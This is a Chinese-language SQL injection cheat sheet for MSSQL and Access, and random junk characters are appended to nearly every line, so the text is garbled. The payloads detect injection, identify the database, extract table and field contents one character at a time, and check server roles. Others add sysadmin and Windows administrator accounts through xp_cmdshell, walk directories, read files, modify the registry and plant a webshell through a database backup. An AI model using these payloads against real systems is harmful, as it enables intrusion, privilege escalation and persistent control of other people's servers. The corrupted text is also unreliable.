1.判断是否有注入;and 1=1 ;and 1=2 /_@S*=T5
2.初步判断是否是mssql ;and user>0 V9-pY/v9
Ev0GAc1
3.注入参数是字符'and [查询条件] and ''=' p^Ca-+R3
EJjTf:
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ;38W41d{
:^0g}8$<
5.判断数据库系统 y$r^UjJEO
MG>g?s'!
;and (select count(*) from sysobjects)>0 mssql t;Jt+k~
IJ!]1fXy+
;and (select count(*) from msysobjects)>0 access |xZDc6HDW
33J}AK^FE
9-o{[
)b
m|],'
6.猜数据库 ;and (select Count(*) from [数据库名])>0 uYIw ?fXy
yiQke
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 v\rOs+.s
uEWW Y t
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 +cvz
V[wEn9
9.(1)猜字段的ascii值(access) H1| -f]!
:{h,0w'd
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 $ ;>,
jec03wH_0
(2)猜字段的ascii值(mssql) ]/p0j$Tq$
M$1+,[^f
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 }U7>_b2
qnW5I_]
10.测试权限结构(mssql) l<PGUm:_
Fly@"W4a
'&Q_5\Tn
,a?)#X
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- _Jk-nZgn
SOb17:o3|
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- $JqdI/s
~53E)ilB
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- CEc&
G
^8.R 'Yq
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Tr)a6Cf
(6u<w#u
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- vxUJ4|Qz
[4
g5{eX
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- [A|W0
Wq0h3AjR
;and 1=(select IS_MEMBER('db_owner'));-- |O\(<n S
/AJ^wY
f<xF+wE
$%;NX[>j
11.添加mssql和系统的帐户 <3P?rcd,5K
n]ar\f
;exec master.dbo.sp_addlogin username;-- d`StBXG!
;exec master.dbo.sp_password null,username,password;-- R"5/
~ Cks)mJs
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Z@
h<xo*r
?@|1>epgd
;exec master.dbo.xp_cmdshell 'net user username password 4I"QT(;
EYGJDv(S
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 174H@
fB1JU1
;exec master.dbo.xp_cmdshell 'net user username password /add';-- miuJ!Kr'
]j*o&6cQf
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- zVxiCyU
[H0jDbN
tFwQ /
\b.2f+;3
12.(1)遍历目录 "M7ry9dDH
Lr)h>j6\
;create table dirs(paths varchar(100), id int)
L]9!-E
m4E 6L
;insert dirs exec master.dbo.xp_dirtree 'c:\' hrZ~7 0r
<$UMMA
;and (select top 1 paths from dirs)>0 b$PNZC8f
Y4@~NCU/
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) F5:*;E;$
:J(a;/~ip
wa<@bub
J2aA"BhdC"
(2)遍历目录 jV:U%
8f,jC+(
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 3tnYK&
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 m f4@g05
s=q\BmG
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 BRoi`.b:
Zdh4CNEeFP
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 kC|tv{g#>
xw%?R=&L
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 yu#Jw
.Yha(5(
feNr!/
6 Y&OG>_\
13.mssql中的存储过程 ' AeU
lqX]'gu]\
xp_regenumvalues 注册表根键, 子键 Rr%]/%
:U?P~HI
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 F`Q,pBl1p6
b ";#qVv C
xp_regread 根键,子键,键值名 8C,?Ai<ro
"kP.Kx!
;exec xp_regread L2{to f
@#VxjXW^
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 M*t@Q|$:
E'XFn'
xp_regwrite 根键,子键, 值名, 值类型, 值 e{=7,DRH<
RF6(n8["MW
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 J'@I!Jc
<+_OgF1G
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 B'yN &3
gQ?>%t]
xp_regdeletevalue 根键,子键,值名 r+m8#uR
WgE~H)_%
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 gjo\gP@
@sfV hWG
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 \VtCkb
uAVV4)
F{l,Tl"Jw
~p'/Z@Atu
14.mssql的backup创建webshell 'QCvN b6
s4~c>voQB
use model yaR|d3ef?4
ik&loM_
create table cmd(str image); ,Oxdqx u7
@Z3b^G[
insert into cmd(str) values (''); 6K`frt
7acAU{Rr
backup database model to disk='c:\l.asp'; 7t@jj%F
mXhr: e
E8%O+x}
_$cQAH0 E
15.mssql内置函数 1-w1k^e
Dm 'Q&
;and (select @@version)>0 获得Windows的版本号 =i:?4pIZ
2jx""{
;and user_name()='dbo' 判断当前系统的连接用户是不是sa /^4)V8D_S
4`Fbl]Q
;and (select user_name())>0 爆当前系统的连接用户 %}j/G l5
[c>X Q
;and (select db_name())>0 得到当前连接的数据库 Onot<}K
ShCAkaj_
yD(/y"P,9
3kKXzIh
16.简洁的webshell N66jFRA;x
x!I7vs~~zW
use model |2n2
>{m>&u;Cc
create table cmd(str image); 0Fbq/63
rTmcP23]
insert into cmd(str) values (''); @Ki`g(],P
G4g},p!
backup database model to disk='g:\wwwtest\l.asp';